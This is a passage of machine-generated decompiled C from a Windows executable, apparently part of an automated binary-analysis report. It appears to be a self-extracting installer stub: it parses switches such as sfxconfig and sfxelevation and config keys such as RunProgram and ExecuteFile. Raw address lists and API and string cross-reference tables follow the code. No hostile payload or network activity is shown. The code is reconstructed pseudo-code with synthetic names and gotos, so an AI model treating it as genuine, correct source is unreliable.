																									if(_t348 <= 0x5a) {
																										continue;
																									}
																									goto L151;
																								}
																								__eflags = _t348 - 0x7a;
																								if(_t348 <= 0x7a) {
																									continue;
																								}
																								goto L149;
																							}
																							__eflags = _t348 - 0x39;
																							if(_t348 <= 0x39) {
																								continue;
																							}
																							goto L147;
																						}
																						E0040976C(0, 0, 0xe,  *((intOrPtr*)(_t720 + 0x4c)));
																						_push( *((intOrPtr*)(_t720 + 0x4c)));
																						L004191B0();
																						_push( *((intOrPtr*)(_t720 + 0x58)));
																						L004191B0();
																						_t725 = _t725 + 0x14;
																						_push(6);
																						goto L22;
																					}
																				}
																				_t358 = E00409F6B();
																				goto L128;
																			} else {
																				_t358 = E0040A049();
																				L128:
																				_t703 = _t358;
																				goto L73;
																			}
																		} else {
																			_t360 = E00405041();
																			_t710 = _t360;
																			__eflags = _t360;
																			if(__eflags == 0) {
																				_t573 = 0x18;
																				_t710 = E00403DC8(_t573);
																			}
																			E004076D3(_t720 - 0x9c, 0, __eflags);
																			 *((intOrPtr*)(_t720 - 0x9c)) = "G]@";
																			 *((intOrPtr*)(_t720 - 0x64)) = 0x7d6;
																			E00407734(E00407A45(_t720 - 0x9c, 0x11,  *0x41e738, _t710, 0), _t720 - 0x9c);
																			goto L119;
																		}
																	}
																	 *(_t720 + 0x44) = _t274;
																	 *((short*)( *((intOrPtr*)(_t720 + 0x40)) + _t274 + _t274)) = 0;
																	_t120 = _t685 + 2; // 0x2
																	E00405051( *((intOrPtr*)(_t720 + 0x40)), _t274 + _t274 + _t120, __eflags, 0);
																	_push( *((intOrPtr*)(_t720 + 0x40)));
																	_t122 = _t720 + 0x3c;
																	 *_t122 =  *(_t720 + 0x3c) + 1;
																	__eflags =  *_t122;
																	L004191B0();
																	_t272 = E00405041();
																}
																goto L113;
															}
															__eflags =  *0x41e774 & 0x00000004;
															if(( *0x41e774 & 0x00000004) == 0) {
																goto L107;
															}
															_t367 = E00403FF2();
															__eflags = _t367;
															if(_t367 != 0) {
																goto L107;
															}
															E00411B60(E00411B60(_t367, _t720 + 0x18), _t720 - 0x30);
															E00411B84(_t720 + 0x30, E0040310A(GetCommandLineW(), _t720 + 0x18));
															E00411A62(_t720 + 4, __eflags, E00411B08(_t720 - 0xac, E00411B08(_t720 - 0x3c, E00411B32(_t720 - 0x14, "\"", _t720 + 0x18), L"\" -"), L"sfxelevation"), 0x20);
															E00411BE5(_t720 - 0x30,  *((intOrPtr*)(E00411AEC(_t720 + 0x40, _t720 + 4, _t720 + 0x30))));
															_push( *((intOrPtr*)(_t720 + 0x40)));
															L004191B0();
															_push( *(_t720 + 4));
															L004191B0();
															_push( *((intOrPtr*)(_t720 - 0xac)));
															L004191B0();
															_push( *((intOrPtr*)(_t720 - 0x3c)));
															L004191B0();
															_push( *((intOrPtr*)(_t720 - 0x14)));
															L004191B0();
															_t728 = _t725 + 0x14;
															SetProcessWorkingSetSize(GetCurrentProcess(), 0xffffffff, 0xffffffff);
															_push(0);
															_t676 = 2;
															_t383 = E00401CC0( *((intOrPtr*)(_t720 - 0x30)), _t676, __eflags);
															_push( *((intOrPtr*)(_t720 + 0x30)));
															__eflags = _t383;
															if(_t383 != 0) {
																L004191B0();
																_push( *((intOrPtr*)(_t720 - 0x30)));
																L004191B0();
																_push( *((intOrPtr*)(_t720 + 0x18)));
																L004191B0();
																_push( *((intOrPtr*)(_t720 + 0x58)));
																L004191B0();
																_t725 = _t728 + 0x10;
																goto L10;
															}
															L004191B0();
															_push( *((intOrPtr*)(_t720 - 0x30)));
															L004191B0();
															_push( *((intOrPtr*)(_t720 + 0x18)));
															L004191B0();
															_push( *((intOrPtr*)(_t720 + 0x58)));
															L004191B0();
															_t725 = _t728 + 0x10;
															_push(0xb);
															goto L22;
														}
														E0040B1F0(_t720 - 0x158);
														E0040B440(_t720 - 0x158, _t705, lstrlenW(_t705) + _t385);
														E0040B6F0(_t720 - 0x158, _t720 - 0xcc);
														_t592 = 8;
														memcpy(_t720 - 0xf0, "123456789ABCDEFGHJKMNPQRSTUVWXYZ", _t592 << 2);
														_t725 = _t725 + 0xc;
														asm("movsb");
														_t594 = 0;
														__eflags = 0;
														do {
															_t679 =  *(_t720 + _t594 * 4 - 0xbc);
															 *(_t720 + _t594 * 4 - 0xcc) =  *(_t720 + _t594 * 4 - 0xcc) ^ _t679;
															_t594 = _t594 + 1;
															__eflags = _t594 - 4;
														} while (_t594 < 4);
														_t456 = 0;
														_t696 = 0;
														__eflags = 0;
														do {
															asm("cdq");
															_t679 = _t679 & 0x00000007;
															_t712 =  *(_t720 + (_t696 + _t679 >> 3) - 0xcc) & 0x000000ff;
															_t596 = _t696 & 0x80000007;
															__eflags = _t596;
															if(_t596 < 0) {
																_t596 = (_t596 - 0x00000001 | 0xfffffff8) + 1;
																__eflags = _t596;
															}
															_t714 = _t712 >> _t596 & 0x0000001f;
															__eflags = _t696;
															if(_t696 != 0) {
																asm("cdq");
																_t598 = 0x19;
																_t679 = _t696 % _t598;
																__eflags = _t679;
																if(_t679 == 0) {
																	_t400 = 0x2d;
																	 *((short*)(_t720 + _t456 * 2 - 0x88)) = _t400;
																	_t456 = _t456 + 1;
																	__eflags = _t456;
																}
															}
															 *((short*)(_t720 + _t456 * 2 - 0x88)) =  *((char*)(_t720 + _t714 - 0xf0));
															_t696 = _t696 + 5;
															_t456 = _t456 + 1;
															__eflags = _t696 - 0x7d;
														} while (_t696 < 0x7d);
														__eflags = 0;
														 *((short*)(_t720 + _t456 * 2 - 0x88)) = 0;
														E00411BE5(0x41e708, _t720 - 0x88);
														 *0x41e700 = 1;
														_t452 = 0x41e7b8;
														goto L101;
													}
													_push( *((intOrPtr*)(_t720 + 0x58)));
													L004191B0();
													_push(0x20);
													goto L22;
												}
												_t637 = L"sfxconfig";
												_t401 = E004057A2(_t684, L"sfxconfig");
												__eflags = _t401;
												if(_t401 == 0) {
													goto L84;
												}
												__eflags =  *_t401 - 0x3a;
												if( *_t401 == 0x3a) {
													_t401 =  &(_t401[1]);
													__eflags = _t401;
												}
												_t603 =  *_t401 & 0x0000ffff;
												__eflags = _t603;
												if(_t603 == 0) {
													goto L119;
												} else {
													while(1) {
														__eflags = _t603 - 0x20;
														if(_t603 > 0x20) {
															break;
														}
														_t401 =  &(_t401[1]);
														_t603 =  *_t401 & 0x0000ffff;
														__eflags = _t603;
														if(_t603 != 0) {
															continue;
														}
														break;
													}
													__eflags =  *_t401;
													if( *_t401 == 0) {
														goto L119;
													}
													_t680 = _t720 + 0x58;
													_t402 = E00406013(_t401, _t720 + 0x58);
													__eflags = _t402;
													if(_t402 != 0) {
														goto L119;
													}
													_push(0xa);
													_push(0);
													E0040976C(_t680);
													_push( *((intOrPtr*)(_t720 + 0x58)));
													L004191B0();
													_t725 = _t725 + 0xc;
													_push(4);
													goto L22;
												}
											}
											L73:
											_push( *((intOrPtr*)(_t720 + 0x58)));
											L004191B0();
											goto L18;
										} else {
											E0040976C(_t636, 1, 7,  *0x41e844);
											_t725 = _t725 + 0xc;
											_push(2);
											L22:
											_pop(_t703);
											goto L11;
										}
									}
									__eflags =  *_t701 - 0x3a;
									if( *_t701 == 0x3a) {
										_t614 =  *(_t701 + 2) & 0x0000ffff;
										_t697 = 0x20;
										_t419 = (_t614 | _t697) - 0x61;
										__eflags = _t419;
										if(_t419 == 0) {
											 *0x41e8d8 = 2;
											while(1) {
												L57:
												__eflags =  *_t701 - _t697;
												if( *_t701 <= _t697) {
													break;
												}
												_t701 = _t701 + 2;
												__eflags = _t701;
											}
											_t636 = L"sfxconfig";
											_t684 = _t701;
											_t420 = E004057A2(_t701, L"sfxconfig");
											__eflags = _t420;
											if(_t420 == 0) {
												goto L66;
											}
											__eflags =  *_t420 - 0x3a;
											if( *_t420 != 0x3a) {
												L63:
												_t616 =  *_t420 & 0x0000ffff;
												__eflags = _t616;
												if(_t616 != 0) {
													__eflags = _t616 - 0x20;
													if(_t616 > 0x20) {
														goto L64;
													}
													L62:
													_t420 = _t420 + 2;
													__eflags = _t420;
													goto L63;
												}
												L64:
												 *(_t720 + 0x28) =  *(_t720 + 0x28) & 0x00000000;
												 *((short*)( *((intOrPtr*)(_t720 + 0x24)))) = 0;
												_t636 = _t720 + 0x24;
												_t421 = E0040310A(_t420, _t720 + 0x24);
												__eflags =  *0x41e8d8 - 2;
												_t684 = _t421;
												if( *0x41e8d8 != 2) {
													E00411C48(0x41e844, _t720 + 0x24);
												}
												goto L66;
											}
											goto L62;
										}
										_t425 = _t419;
										__eflags = _t425;
										if(_t425 == 0) {
											__eflags =  *(_t701 + 4) - 0x63;
											 *0x41e8d8 = (0 |  *(_t701 + 4) == 0x00000063) + 3;
											goto L57;
										}
										_t429 = _t425 - 1;
										__eflags = _t429;
										if(_t429 == 0) {
											__eflags = _t614 - 0x44;
											if(_t614 != 0x44) {
												_t701 = _t701 + 4;
												__eflags = _t701;
												L49:
												 *0x41e8d4 =  *0x41e8d4 & 0x00000000;
												__eflags =  *_t701 - 0x3a;
												if( *_t701 != 0x3a) {
													L52:
													 *0x41e8d4 = 0xa;
													L53:
													 *0x41e8d8 = 1;
													goto L57;
												}
												_t26 = _t701 + 2; // -2
												_t430 = _t26;
												__imp___wtol(_t430);
												 *0x41e8d4 = _t430;
												__eflags = _t430 - 0xe10;
												if(_t430 > 0xe10) {
													goto L52;
												}
												__eflags = _t430;
												if(_t430 != 0) {
													goto L53;
												}
												goto L52;
											}
											__eflags =  *(_t701 + 4) - 0x3a;
											if( *(_t701 + 4) != 0x3a) {
												goto L21;
											}
											_t701 = _t701 + 6;
											while(1) {
												_t431 =  *_t701 & 0x0000ffff;
												__eflags = _t431 - _t697;
												if(_t431 <= _t697) {
													break;
												}
												__eflags = _t431 - 0x3a;
												if(_t431 == 0x3a) {
													break;
												}
												E004015EC(0x41e8dc, _t431 & 0x0000ffff);
												_t701 = _t701 + 2;
												__eflags = _t701;
											}
											__eflags =  *0x41e8e0;
											if( *0x41e8e0 != 0) {
												goto L49;
											}
											goto L21;
										}
										_t434 = _t429 - 0xb;
										__eflags = _t434;
										if(_t434 == 0) {
											__eflags =  *(_t701 + 4) - 0x3a;
											if( *(_t701 + 4) != 0x3a) {
												goto L10;
											}
											_t436 = ( *(_t701 + 6) & 0x0000ffff) - 0x31;
											__eflags = _t436;
											if(_t436 == 0) {
												_t703 = 1;
												goto L11;
											}
											_t437 = _t436 - 1;
											__eflags = _t437;
											if(_t437 == 0) {
												_t703 = 0x5b7;
												goto L11;
											}
											_t438 = _t437 - 1;
											__eflags = _t438;
											if(_t438 == 0) {
												_push(0x1f);
												goto L22;
											}
											_t439 = _t438 - 1;
											__eflags = _t439;
											if(_t439 == 0) {
												_t703 = 0x3fff;
												goto L11;
											}
											__eflags = _t439 != 1;
											if(_t439 != 1) {
												goto L10;
											}
											goto L35;
										}
										__eflags = _t434 != 7;
										if(_t434 != 7) {
											goto L21;
										} else {
											_t703 = 0x4f3c;
											goto L11;
										}
									}
									L21:
									_push(0x64);
									goto L22;
								} else {
									_t703 = 1;
									__eflags = 1;
									_push(6);
									_push(1);
									E0040976C(_t635);
									L18:
									goto L11;
								}
							} else {
								_t703 = E00402013(_t239, _t684);
								goto L11;
							}
						} else {
							E00405DA5(L"sfxversion", _t684, _t736);
							L10:
							_t703 = 0;
							L11:
							_push( *(_t720 - 8));
							L004191B0();
							_push( *((intOrPtr*)(_t720 - 0x48)));
							L004191B0();
							_push( *((intOrPtr*)(_t720 + 0x24)));
							L004191B0();
							_t218 = _t703;
							L216:
							return _t218;
						}
					} else {
						_t445 = _t237 + 2;
						__imp___wtol(_t445);
						_t16 = _t445 - 1; // -1
						if(_t16 <= 0xfffe) {
							 *0x41e730 = _t445;
						}
						do {
							_t684 = _t684 + 2;
						} while ( *_t684 > 0x20);
						goto L8;
					}
				}
			}

0x00406128
0x00406129
0x0040612d
0x0040613b
0x00406142
0x0040614e
0x00406160
0x004070f7
0x00407105
0x0040710d
0x00000000
0x00406173
0x00406173
0x0040617a
0x00000000
0x00000000
0x00406183
0x0040618a
0x004061a1
0x004061a6
0x004061c1
0x004061c9
0x004061ce
0x004061df
0x004061f1
0x00406200
0x0040621d
0x00406223
0x00406229
0x00406237
0x00406243
0x0040624a
0x00406277
0x0040627e
0x00406283
0x00406285
0x004062b7
0x004062bc
0x004062be
0x004062cb
0x004062d2
0x004062d6
0x004062db
0x004062dd
0x004062df
0x004062e3
0x004062e3
0x004062f3
0x004062fb
0x00406301
0x00406303
0x00406319
0x0040631e
0x0040632a
0x0040632c
0x0040632e
0x004064bf
0x004064ca
0x004064d7
0x004064de
0x004064e3
0x004064e5
0x004064eb
0x004064f1
0x004064fb
0x004064ff
0x00406504
0x0040650b
0x00406510
0x00406515
0x00406521
0x0040652a
0x0040652f
0x00406531
0x00406533
0x00406539
0x0040653b
0x00406540
0x00406540
0x0040654c
0x00406553
0x0040655c
0x00406561
0x00406566
0x0040656c
0x00406571
0x00406577
0x00406577
0x00406587
0x00406592
0x00406599
0x0040659e
0x004065a0
0x004065c8
0x004065cd
0x004065d7
0x004065d9
0x004065de
0x004065e0
0x004065e2
0x004065f1
0x004065f8
0x00406667
0x00406667
0x0040666e
0x00406a35
0x00406a35
0x00406a38
0x00000000
0x00406a3d
0x00406674
0x00406679
0x004066b1
0x004066b1
0x004066b3
0x00000000
0x00000000
0x0040668d
0x00406695
0x0040669f
0x004066a7
0x004066ac
0x004066ac
0x004066af
0x004066af
0x004066b6
0x004066b8
0x004066bd
0x004066c2
0x004066c5
0x004066c7
0x004066d9
0x004066ea
0x004066ec
0x004066ee
0x004067d8
0x004067e4
0x004067e9
0x004067f4
0x004067f9
0x00406800
0x00406805
0x0040680a
0x0040680f
0x00406813
0x00406950
0x00406950
0x0040695d
0x004069af
0x004069af
0x004069b1
0x004069b3
0x00000000
0x00000000
0x0040696a
0x00406974
0x00406975
0x0040697a
0x0040697c
0x004069b7
0x004069ba
0x004069c0
0x004069c0
0x004069c5
0x004069cc
0x004069ce
0x004069ce
0x004069d4
0x004069da
0x00406a43
0x00406a49
0x00406a4b
0x00406a4b
0x00406a4b
0x00406a56
0x00406a63
0x00406a6d
0x00406a6f
0x00406a74
0x00406a79
0x00406a79
0x00406a82
0x00406a8e
0x00406a93
0x00406a95
0x00406a98
0x00406a9f
0x00406a9f
0x00406aa4
0x00406aaa
0x00406ab8
0x00406abf
0x00406ac8
0x00406ad6
0x00406adb
0x00406ae9
0x00406af3
0x00406af5
0x00406af7
0x00406afe
0x00406b02
0x00406b07
0x00406b14
0x00406b19
0x00406b22
0x00406b29
0x00406b2e
0x00406b3c
0x00406b41
0x00406b44
0x00406b49
0x00406afe
0x00406b4f
0x00406b54
0x00406b5b
0x00406b60
0x00406b62
0x00000000
0x00000000
0x00406b64
0x00406b6b
0x00000000
0x00000000
0x00406b6d
0x00406b75
0x00406b7a
0x00406b7c
0x00406cbc
0x00406cbf
0x00406cc4
0x00406cc5
0x00000000
0x00406cc5
0x00406b84
0x00406b8f
0x00406b92
0x00406b94
0x00406b94
0x00406b9d
0x00406ba4
0x00406ba6
0x00406ba6
0x00406ba6
0x00406bb0
0x00406bb3
0x00406bb8
0x00406bbf
0x00406c23
0x00406c23
0x00406c27
0x00406c2b
0x00406c36
0x00406c3b
0x00406c3d
0x00406c43
0x00406c48
0x00406c48
0x00406c4c
0x00406c50
0x00406c5b
0x00406c60
0x00406c62
0x00406c68
0x00406c68
0x00406c62
0x00406c50
0x00406c6d
0x00406c74
0x00406d02
0x00406d02
0x00406d09
0x00406d3d
0x00406d45
0x00406d4a
0x00406d4e
0x00406d56
0x00406d56
0x00406d5b
0x00406d5e
0x00406d65
0x00406d0b
0x00406d1e
0x00406d23
0x00406d26
0x00406d2b
0x00406d2b
0x00406d6a
0x00406d70
0x00406d76
0x00406d76
0x00406d7b
0x00406d7e
0x00406d85
0x00406d85
0x00406d86
0x00406d88
0x00406d8e
0x00000000
0x00406d80
0x00406d80
0x00406d83
0x00406d92
0x00406d92
0x00406d99
0x00406d9b
0x00406d9b
0x00406d9b
0x00406dab
0x00406db0
0x00406dbc
0x00406dc4
0x00406dc6
0x00406dcb
0x00406dcd
0x00406dcf
0x00406dd6
0x00406dda
0x00406ddf
0x00406dec
0x00406df1
0x00406dfa
0x00406dff
0x00406e06
0x00406e09
0x00406e0e
0x00406e1e
0x00406e23
0x00406e26
0x00406e2b
0x00406dd6
0x00406e2c
0x00406e33
0x00406e41
0x00406e46
0x00406e48
0x00000000
0x00000000
0x00406e4a
0x00000000
0x00406e35
0x00406e3a
0x00406e4f
0x00406e4f
0x00406e51
0x00406e7a
0x00406e7a
0x00406e7f
0x00406e86
0x00406e95
0x00406ea0
0x00406ea5
0x00406eac
0x00406eb1
0x00406eb1
0x00406eb6
0x00406eb8
0x00406ebb
0x00406f87
0x00406f9a
0x00000000
0x00406ec1
0x00406ec1
0x00406ec7
0x00406f9f
0x00406f9f
0x00406fa5
0x00406fa7
0x00406fbe
0x00406fc9
0x00406fe1
0x00406fe6
0x00406fe6
0x00406feb
0x00406fee
0x00406ff3
0x00406ff6
0x00407001
0x00407001
0x00407008
0x0040701d
0x0040701d
0x00407023
0x00407031
0x00407033
0x00407035
0x0040703c
0x00407042
0x00407044
0x00407044
0x0040704f
0x00407064
0x0040706e
0x00407080
0x00407080
0x00407035
0x00407085
0x00407085
0x0040708c
0x0040708e
0x00407094
0x0040709d
0x004070a2
0x004070a4
0x004070a6
0x004070aa
0x004070b6
0x004070bb
0x004070bb
0x004070aa
0x004070a4
0x00407094
0x004070c0
0x004070c3
0x004070c8
0x004070cb
0x004070d0
0x004070d3
0x004070d8
0x004070db
0x004070e0
0x004070e3
0x004070e8
0x004070eb
0x004070f3
0x00000000
0x004070f3
0x0040700a
0x00407011
0x00000000
0x00000000
0x00407013
0x00000000
0x00407013
0x00406ecd
0x00406ee5
0x00406ef4
0x00406ef9
0x00406efc
0x00406f01
0x00406f04
0x00406f0e
0x00406f14
0x00406f17
0x00406f56
0x00406f60
0x00406f74
0x00406f79
0x00406f7c
0x00000000
0x00406f81
0x00406f19
0x00406f1e
0x00406f20
0x00406f21
0x00406f26
0x00406f29
0x00406f2e
0x00406f31
0x00406f36
0x00406f39
0x00406f3e
0x00406f41
0x00406f46
0x00406f49
0x00406f4e
0x00406399
0x00406399
0x00000000
0x00406399
0x00406ebb
0x00406e88
0x00406e8f
0x00406fff
0x00406fff
0x00000000
0x00406fff
0x00000000
0x00406e8f
0x00406e53
0x00406e58
0x00406e5b
0x00406e60
0x00406e63
0x00406e68
0x00406e6b
0x00406e70
0x00406e73
0x00000000
0x00406e73
0x00406e33
0x00000000
0x00406d83
0x00406c7a
0x00406c7a
0x00406c81
0x00000000
0x00000000
0x00406c83
0x00406c8d
0x00406c8f
0x00000000
0x00000000
0x00406c91
0x00406c97
0x00406c9d
0x00406ca2
0x00406ca4
0x00000000
0x00000000
0x00406ca6
0x00406ca9
0x00406caf
0x00406cf2
0x00406cf7
0x00406cfa
0x00000000
0x00406cff
0x00406cb1
0x00000000
0x00406cb6
0x00406c74
0x00406bc1
0x00406bc7
0x00406bcf
0x00406bdb
0x00406be5
0x00406bea
0x00406bec
0x00000000
0x00000000
0x00406bf2
0x00406bf5
0x00406bf8
0x00406bfb
0x00406c02
0x00406c02
0x00406c05
0x00406c0c
0x00406c0c
0x00406c0f
0x00406c16
0x00406c1e
0x00000000
0x00406c1e
0x00406c11
0x00406c14
0x00000000
0x00000000
0x00000000
0x00406c14
0x00406c07
0x00406c0a
0x00000000
0x00000000
0x00000000
0x00406c0a
0x00406bfd
0x00406c00
0x00000000
0x00000000
0x00000000
0x00406c00
0x00406cd3
0x00406cd8
0x00406cdb
0x00406ce0
0x00406ce3
0x00406ce8
0x00406ceb
0x00000000
0x00406ceb
0x00406b54
0x00406ac1
0x00000000
0x00406aac
0x00406aac
0x00406ab1
0x00406ab1
0x00000000
0x00406ab1
0x004069dc
0x004069e3
0x004069e8
0x004069ea
0x004069ec
0x004069f0
0x004069f6
0x004069f6
0x004069fe
0x00406a14
0x00406a1e
0x00406a30
0x00000000
0x00406a30
0x004069da
0x00406981
0x00406988
0x00406990
0x00406994
0x00406999
0x0040699c
0x0040699c
0x0040699c
0x0040699f
0x004069aa
0x004069aa
0x00000000
0x004069b5
0x00406819
0x00406820
0x00000000
0x00000000
0x00406826
0x0040682b
0x0040682d
0x00000000
0x00000000
0x0040683e
0x00406857
0x00406894
0x004068ad
0x004068b2
0x004068b5
0x004068ba
0x004068bd
0x004068c2
0x004068c8
0x004068cd
0x004068d0
0x004068d5
0x004068d8
0x004068dd
0x004068eb
0x004068f4
0x004068f7
0x004068f8
0x004068fd
0x00406900
0x00406902
0x0040692b
0x00406930
0x00406933
0x00406938
0x0040693b
0x00406940
0x00406943
0x00406948
0x00000000
0x00406948
0x00406904
0x00406909
0x0040690c
0x00406911
0x00406914
0x00406919
0x0040691c
0x00406921
0x00406924
0x00000000
0x00406924
0x004066fa
0x00406711
0x00406722
0x00406729
0x00406735
0x00406735
0x00406737
0x00406738
0x00406738
0x0040673a
0x0040673a
0x00406748
0x0040674a
0x0040674b
0x0040674b
0x00406750
0x00406752
0x00406752
0x00406754
0x00406756
0x00406757
0x0040675f
0x00406769
0x00406769
0x0040676f
0x00406775
0x00406775
0x00406775
0x00406778
0x0040677b
0x0040677d
0x00406783
0x00406784
0x00406785
0x00406787
0x00406789
0x0040678d
0x0040678e
0x00406796
0x00406796
0x00406796
0x00406789
0x004067a0
0x004067a8
0x004067ab
0x004067ac
0x004067ac
0x004067b1
0x004067b3
0x004067c7
0x004067cc
0x004067d3
0x00000000
0x004067d3
0x004066c9
0x004066cc
0x004066d2
0x00000000
0x004066d2
0x004065fa
0x00406601
0x00406606
0x00406608
0x00000000
0x00000000
0x0040660a
0x0040660e
0x00406610
0x00406610
0x00406610
0x00406613
0x00406616
0x00406619
0x00000000
0x0040661f
0x0040661f
0x0040661f
0x00406623
0x00000000
0x00000000
0x00406625
0x00406628
0x0040662b
0x0040662e
0x00000000
0x00000000
0x00000000
0x0040662e
0x00406630
0x00406634
0x00000000
0x00000000
0x0040663a
0x0040663f
0x00406644
0x00406646
0x00000000
0x00000000
0x0040664c
0x0040664e
0x00406650
0x00406655
0x00406658
0x0040665d
0x00406660
0x00000000
0x00406660
0x00406619
0x004065e4
0x004065e4
0x004065e7
0x00000000
0x004065a2
0x004065ac
0x004065b1
0x004065b4
0x0040633c
0x0040633c
0x00000000
0x0040633c
0x004065a0
0x00406334
0x00406338
0x00406342
0x0040634a
0x0040634d
0x0040634d
0x00406350
0x00406454
0x00406463
0x00406463
0x00406463
0x00406466
0x00000000
0x00000000
0x00406460
0x00406460
0x00406460
0x00406468
0x0040646f
0x00406471
0x00406476
0x00406478
0x00000000
0x00000000
0x0040647a
0x0040647e
0x0040648b
0x0040648b
0x0040648e
0x00406491
0x00406482
0x00406486
0x00000000
0x00000000
0x00406488
0x00406488
0x00406488
0x00000000
0x00406488
0x00406493
0x00406496
0x0040649c
0x0040649f
0x004064a4
0x004064a9
0x004064b0
0x004064b2
0x004064ba
0x004064ba
0x00000000
0x004064b2
0x00000000
0x00406480
0x00406357
0x00406357
0x00406358
0x00406442
0x0040644d
0x00000000
0x0040644d
0x0040635e
0x0040635e
0x0040635f
0x004063bd
0x004063c0
0x004063ff
0x004063ff
0x00406402
0x00406402
0x00406409
0x0040640d
0x0040642a
0x0040642a
0x00406434
0x00406434
0x00000000
0x00406434
0x0040640f
0x0040640f
0x00406413
0x0040641a
0x0040641f
0x00406424
0x00000000
0x00000000
0x00406426
0x00406428
0x00000000
0x00000000
0x00000000
0x00406428
0x004063c2
0x004063c7
0x00000000
0x00000000
0x004063cd
0x004063e9
0x004063e9
0x004063ec
0x004063ef
0x00000000
0x00000000
0x004063d2
0x004063d6
0x00000000
0x00000000
0x004063e1
0x004063e6
0x004063e6
0x004063e6
0x004063f1
0x004063f8
0x00000000
0x00000000
0x00000000
0x004063fa
0x00406361
0x00406361
0x00406364
0x00406375
0x0040637a
0x00000000
0x00000000
0x00406384
0x00406384
0x00406387
0x004063b7
0x00000000
0x004063b7
0x00406389
0x00406389
0x0040638a
0x004063ab
0x00000000
0x004063ab
0x0040638c
0x0040638c
0x0040638d
0x004063a7
0x00000000
0x004063a7
0x0040638f
0x0040638f
0x00406390
0x0040639d
0x00000000
0x0040639d
0x00406392
0x00406393
0x00000000
0x00000000
0x00000000
0x00406393
0x00406366
0x00406369
0x00000000
0x0040636b
0x0040636b
0x00000000
0x0040636b
0x00406369
0x0040633a
0x0040633a
0x00000000
0x00406305
0x00406307
0x00406307
0x00406308
0x0040630a
0x0040630b
0x00406311
0x00000000
0x00406311
0x004062c0
0x004062c7
0x00000000
0x004062c7
0x00406287
0x00406287
0x0040628c
0x0040628c
0x0040628e
0x0040628e
0x00406291
0x00406296
0x00406299
0x0040629e
0x004062a1
0x004062a9
0x0040710e
0x00407115
0x00407115
0x00406252
0x00406252
0x00406256
0x0040625d
0x00406266
0x00406268
0x00406268
0x0040626e
0x0040626e
0x00406271
0x00000000
0x0040626e
0x0040624a

APIs

?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z.MSVCRT ref: 0040613B

Part of subcall function 0040391C: GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,00406147,?,00000000), ref: 00403928
Part of subcall function 0040391C: CreateWindowExW.USER32 ref: 00403945
Part of subcall function 0040391C: GetDesktopWindow.USER32 ref: 00403951
Part of subcall function 0040391C: GetWindowRect.USER32 ref: 00403958
Part of subcall function 0040391C: SetWindowPos.USER32(00000000,00000000,?,00406147,00000000,00000000,00000004), ref: 0040397C
Part of subcall function 0040391C: SetTimer.USER32(00000000,00000001,00000001,00000000), ref: 0040398C
Part of subcall function 0040391C: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00403999
Part of subcall function 0040391C: DispatchMessageW.USER32 ref: 004039A3
Part of subcall function 0040391C: KillTimer.USER32(00000000,00000001,?,?,?,?,?,?,?,?,?,?,00406147,?,00000000), ref: 004039AC

GetVersionExW.KERNEL32(?,?,00000000), ref: 00406158
MessageBoxA.USER32 ref: 00407105

Part of subcall function 00411B60: ??2@YAPAXI@Z.MSVCRT ref: 00411B68

Part of subcall function 00405502: LoadLibraryA.KERNEL32(kernel32,?,?,00000000), ref: 00405513
Part of subcall function 00405502: #17.COMCTL32(?,?,00000000), ref: 0040551E
Part of subcall function 00405502: SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000,?,?,00000000), ref: 004055A3
Part of subcall function 00405502: wsprintfW.USER32 ref: 004055B7

GetCommandLineW.KERNEL32(?,00000000), ref: 004061B1

Part of subcall function 00411BE5: ??2@YAPAXI@Z.MSVCRT ref: 00411C17
Part of subcall function 00411BE5: ??3@YAXPAX@Z.MSVCRT ref: 00411C20
Part of subcall function 00411BE5: memcpy.MSVCRT ref: 00411C38

Part of subcall function 00404666: ??3@YAXPAX@Z.MSVCRT ref: 004046D9
Part of subcall function 00404666: ??3@YAXPAX@Z.MSVCRT ref: 004046F5
Part of subcall function 00404666: ??3@YAXPAX@Z.MSVCRT ref: 004046FD
Part of subcall function 00404666: ??3@YAXPAX@Z.MSVCRT ref: 00404768

Part of subcall function 00405051: ??3@YAXPAX@Z.MSVCRT ref: 004050B8
Part of subcall function 00405051: ??3@YAXPAX@Z.MSVCRT ref: 004050C1
Part of subcall function 00405051: ??3@YAXPAX@Z.MSVCRT ref: 004050C9

GetCommandLineW.KERNEL32(00000001,00000001,00000001,00000000,?,00000000), ref: 004061F7

Part of subcall function 004042F3: wcsncpy.MSVCRT ref: 00404321
Part of subcall function 004042F3: ??3@YAXPAX@Z.MSVCRT ref: 0040432C

wsprintfW.USER32 ref: 0040621D

Part of subcall function 004057A2: lstrlenW.KERNEL32(sfxlang,?,74B049F0,?,00000001,00406248,00000001), ref: 004057E3
Part of subcall function 004057A2: lstrlenW.KERNEL32(sfxlang), ref: 004057E8

_wtol.MSVCRT(-00000002,00000001), ref: 00406256
??3@YAXPAX@Z.MSVCRT ref: 00406291
??3@YAXPAX@Z.MSVCRT ref: 00406299
??3@YAXPAX@Z.MSVCRT ref: 004062A1
GetModuleFileNameW.KERNEL32(00000000,00000000,00000208,00000208,00000001), ref: 004062FB
_wtol.MSVCRT(-00000002), ref: 00406413

Part of subcall function 00411743: ??2@YAPAXI@Z.MSVCRT ref: 0041174B

Part of subcall function 00405401: ??3@YAXPAX@Z.MSVCRT ref: 00405445

??3@YAXPAX@Z.MSVCRT ref: 004065E7
??3@YAXPAX@Z.MSVCRT ref: 00406658

Strings

sfxelevation, xrefs: 004062CB, 0040685C
BeginPrompt, xrefs: 00406B56
ExecuteFile, xrefs: 00406C2D, 00406C3F
SfxString%d, xrefs: 00406687
sfxconfig, xrefs: 00406468, 004065FA
FinishMessage, xrefs: 00407027
sfxlang, xrefs: 0040623C
BeginPromptTimeout, xrefs: 00406A89
sfxtest, xrefs: 0040631E
DA, xrefs: 004062EB
Delete, xrefs: 00406FD7
PA, xrefs: 00406582
RunProgram, xrefs: 00406C52, 00406C64
Sorry, this program requires Microsoft Windows 2000 or later., xrefs: 004070FE
sfxwaitall, xrefs: 004062B0
SetEnvironment, xrefs: 00406953
x86, xrefs: 004061D5
SfxVarCmdLine0, xrefs: 004061FB
Shortcut, xrefs: 00406FB4
SfxVarApiPath, xrefs: 00406AD1, 00406B0F, 00406DE7
SfxVarModulePlatform, xrefs: 004061DA
DA, xrefs: 004064BF
SfxAuthor, xrefs: 004066E0
hA, xrefs: 00406AEE
SfxVarSystemLanguage, xrefs: 00406232
HA, xrefs: 00406679
PreExtract, xrefs: 00406DA2, 00406DA7
